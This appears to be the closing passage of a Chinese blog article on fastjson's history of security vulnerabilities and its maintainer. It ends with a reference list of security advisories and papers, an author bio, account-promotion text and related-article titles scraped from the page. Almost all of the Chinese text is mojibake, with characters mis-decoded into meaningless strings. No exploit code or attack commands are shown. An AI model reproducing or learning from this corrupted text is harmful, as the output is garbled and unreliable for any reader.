褰撶劧锛屽揩鐨勫悓鏃朵篃甯︽潵浜嗕竴浜涘畨鍏ㄦ€ч棶棰橈紝杩欐槸涓嶅彲鍚﹁鐨勩€?br/>鏈€鍚庯紝鍏跺疄鎴戣繕鎯宠鍑犲彞锛岃櫧鐒秄astjson鏄樋閲屽反宸村紑婧愬嚭鏉ョ殑锛屼絾鏄嵁鎴戞墍鐭ワ紝杩欎釜椤圭洰澶ч儴鍒嗘椂闂撮兘鏄叾浣滆€呮俯灏戜竴涓汉鍦ㄩ潬涓氫綑鏃堕棿缁存姢鐨勩€?br/>鐭ヤ箮涓婃湁缃戝弸璇达細"娓╁皯鍑犱箮鍑竴宸变箣鍔涙拺璧蜂簡涓€涓骞挎硾浣跨敤JSON搴擄紝鑰屽叾浠栧簱鍑犱箮閮芥槸闈犱竴鏁翠釜鍥㈤槦锛屽氨鍑繖涓€鐐癸紝娓╁皯浣滀负鈥滃垵蹇冧笉鏀圭殑闃块噷鍒濅唬寮€婧愪汉鈥濓紝褰撲箣鏃犳劎銆?quot;
鍏跺疄锛屽叧浜巉astjson婕忔礊鐨勯棶棰橈紝闃块噷鍐呴儴涔熸湁寰堝浜鸿療鐥呰繃锛屼絾鏄療鐥呬箣鍚庡ぇ瀹舵洿澶氱殑鏄粰浜堢悊瑙e拰鍖呭銆?br/>fastjson鐩墠鏄浗浜х被搴撲腑姣旇緝鍑哄悕鐨勪竴涓紝鍙互璇存槸鍊嶅彈鍏虫敞锛屾墍浠ユ笎娓愭垚浜嗗畨鍏ㄧ爺绌剁殑閲嶇偣锛屾墍浠ヤ細鏈変竴浜涙繁搴︾殑婕忔礊琚彂鐜般€傚氨鍍忔俯灏戣嚜宸辫鐨勯偅鏍凤細
"鍜屽彂鐜版紡娲炵浉姣旓紝鏇寸碂绯曠殑鏄湁婕忔礊涓嶇煡閬撹浜哄埄鐢ㄣ€傚強鏃跺彂鐜版紡娲炲苟鍗囩骇鐗堟湰淇鏄畨鍏ㄨ兘鍔涚殑涓€涓綋鐜般€?quot;
灏卞湪鎴戝啓杩欑瘒鏂囩珷鐨勬椂鍊欙紝鍦ㄩ拤閽変笂闂簡娓╁皯涓€涓棶棰橈紝浠栫珶鐒剁鍥烇紝杩欎护鎴戝緢鎯婅銆傚洜涓洪偅澶╂槸鍛ㄦ湯锛屽懆鏈拤閽夊彲浠ュ仛鍒扮鍥烇紝杩欒鏄庝簡浠€涔堬紵
浠栧ぇ姒傜巼鏄湪鍒╃敤鑷繁鐨勪笟浣欑淮鎶astjson鍚р€?br/>鏈€鍚庯紝鐭ラ亾浜唂astjson鍘嗗彶涓婂緢澶氭紡娲炰骇鐢熺殑鍘熷洜涔嬪悗锛屽叾瀹炲鎴戣嚜宸辨潵璇达紝鎴戞槸"鏇村姞鏁㈢敤"fastjson浜嗏€?br/>鑷存暚fastjson锛佽嚧鏁畨鍏ㄧ爺绌惰€咃紒鑷存暚娓╁皯锛?br/>鍙傝€冭祫鏂欙細
https://github.com/alibaba/fastjson/releases
https://github.com/alibaba/fastjson/wiki/security_update_20200601
https://paper.seebug.org/1192/
https://mp.weixin.qq.com/s/EXnXCy5NoGIgpFjRGfL3wQ
http://www.lmxspace.com/2019/06/29/FastJson-鍙嶅簭鍒楀寲瀛︿範

鍏充簬浣滆€咃細Hollis锛圛D锛歨ollischuang锛夛紝涓€涓Coding鏈夌潃鐙壒杩芥眰鐨勪汉锛岀幇浠婚樋閲屽反宸存妧鏈笓瀹讹紝涓汉鎶€鏈崥涓伙紝鎶€鏈枃绔犲叏缃戦槄璇婚噺鏁板崈涓囷紝銆婄▼搴忓憳鐨勪笁闂ㄨ銆嬭仈鍚堜綔鑰呫€?br/>鎶€鏈浘鐗? src=

鐩撮潰Java绗?29鏈燂細鍝釜鍛戒护鍙互鐩戞帶铏氭嫙鏈哄悇绉嶈繍琛岀姸鎬佷俊鎭紵
娣卞叆骞跺彂绗?13鏈燂細鎷撳睍synchronized鈥斺€旈攣浼樺寲

濡傛灉浣犲枩娆㈡湰鏂?
璇烽暱鎸変簩缁寸爜锛屽叧娉?Hollis.
鎶€鏈浘鐗? src=
杞彂鑷虫湅鍙嬪湀锛屾槸瀵规垜鏈€澶х殑鏀寔銆?/p>

鐐逛釜 鍦ㄧ湅
鍠滄鏄竴绉嶆劅瑙?br/>鍦ㄧ湅鏄竴绉嶆敮鎸?br/>鈫樷啒鈫?/p>

以上是关于fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵的主要内容,如果未能解决你的问题,请参考以下文章

鑻规灉涓轰粈涔堜笉灏佹潃 Flutter 锛?/h1>

Redis 鍜?Zookeeper 鍒板簳璋佹洿鐗涳紵

璋锋瓕澶х墰璇达細涓轰粈涔?Kotlin 姣斾綘浠敤鐨勯偅浜涘瀮鍦捐瑷€閮藉ソ

PM璇讳骇鍝佸惎绀哄綍涓€涔?瀵规瘮寰蒋鏁忔嵎寮€鍙戞祦绋?鍘熶功PDF涓嬭浇)

springmvc鍘熺悊|鎵ц杩囩▼|瑙e喅浜嗕粈涔堥棶棰橈紵